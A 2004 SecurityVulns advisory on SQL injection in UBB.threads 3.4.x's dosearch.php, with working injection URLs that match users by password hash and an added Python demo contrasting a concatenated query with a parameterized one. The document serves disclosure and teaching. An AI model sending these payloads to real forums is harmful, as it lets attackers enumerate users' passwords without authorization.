SQL Injection in UBB.threads 3.4.x

2004-10-23T00:00:00
ID SECURITYVULNS:DOC:7058
Type securityvulns
Reporter Securityvulns
Modified 2004-10-23T00:00:00

Description

Product:

UBB.threads

Vendor:

UBBCentral (http://www.ubbcentral.com/)

Versions:

I tested it successfully on 3.4.x. In version 3.5 you need to be logged in to perform a search; I did not test this version.

Problem:

SQL injection in dosearch.php through the Name parameter, which is placed into the search query without escaping:

dosearch.php?Name=' OR U_Password='PWINMD5

where PWINMD5 is the MD5 hash of the password to look for (U_Password stores the MD5 of the user's password).

Impact:

A remote, unauthenticated user can inject SQL through the Name parameter. In the simplest use, the search result tells the attacker which account has a given password hash, so candidate passwords can be tried against every user of the board at once.

Example:

db5c82346d770f48bdd8929094c0c695 is the MD5 hash of "ubbpass".

/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695

or

/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*

Either request selects the user whose password is "ubbpass". In the first form the query's own closing quote terminates the injected hash literal; in the second, '/* closes the literal itself and turns whatever the script appends to the statement into a comment.
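To show the mechanism end to end, here is an added example that is not part of the advisory or of UBB.threads' code. It models, in Python against an in-memory SQLite table, a search query built by string concatenation the way the advisory implies dosearch.php builds it, runs both payload shapes from the advisory against it, and contrasts a parameterized query. The query text, the U_Username column, the table layout and the sample users are assumptions made for the example; only the U_Password column, the MD5 storage of passwords and the payload shapes come from the advisory.

```python
import hashlib
import sqlite3

# Constructed sample data, not taken from the advisory or any real board:
# two users whose U_Password column holds md5(password), as the advisory
# assumes UBB.threads does.
USERS = [
    ("admin", "ubbpass"),
    ("bob", "hunter2"),
]


def md5_hex(s: str) -> str:
    """Hex MD5 of a string, the form the advisory's U_Password= comparison expects."""
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Build the assumed Users table (column names U_Username/U_Password are an assumption
    except for U_Password, which the advisory's payload references)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (U_Username TEXT, U_Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?)",
        [(user, md5_hex(pw)) for user, pw in USERS],
    )
    return conn


def vulnerable_search(conn: sqlite3.Connection, name: str) -> list:
    """Models the flaw: the Name parameter is pasted straight into the SQL text.
    The exact statement in dosearch.php is an assumption; the point is that the
    attacker controls the part between the quotes."""
    sql = "SELECT U_Username FROM Users WHERE U_Username = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_search(conn: sqlite3.Connection, name: str) -> list:
    """The fix: bind the value, so the quote and the OR stay inside the literal."""
    sql = "SELECT U_Username FROM Users WHERE U_Username = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def payload(password_hash: str, comment_tail: bool = False) -> str:
    """The two request shapes from the advisory. Without the tail, the query's own
    closing quote ends the hash literal; with it, '/* closes the literal and
    comments out whatever the script appends after the injected value."""
    p = "' OR U_Password='" + password_hash
    return p + "'/*" if comment_tail else p


def demo() -> dict:
    """Run both payload shapes against the vulnerable and the parameterized query."""
    conn = make_db()
    h = md5_hex("ubbpass")  # the hash an attacker would send to look for "ubbpass"
    return {
        "plain": vulnerable_search(conn, payload(h)),
        "comment": vulnerable_search(conn, payload(h, comment_tail=True)),
        "safe": safe_search(conn, payload(h)),
        "safe_comment": safe_search(conn, payload(h, comment_tail=True)),
    }


if __name__ == "__main__":
    # Both injected requests return ["admin"]; the parameterized query returns nothing,
    # because no username literally equals the payload string.
    for label, result in demo().items():
        print(f"{label:13s} -> {result}")
```

Because the injected OR compares U_Password against a hash the attacker chose, the query answers "which user has this password" rather than "which user has this name", which is exactly the leak the advisory describes; with the bound parameter the same input is just an unmatched username.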

Greets fly out to:

felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32, peti, danjo, milch_trinker, hecky, and all i forgot

Greets Florian Rock aka Remoter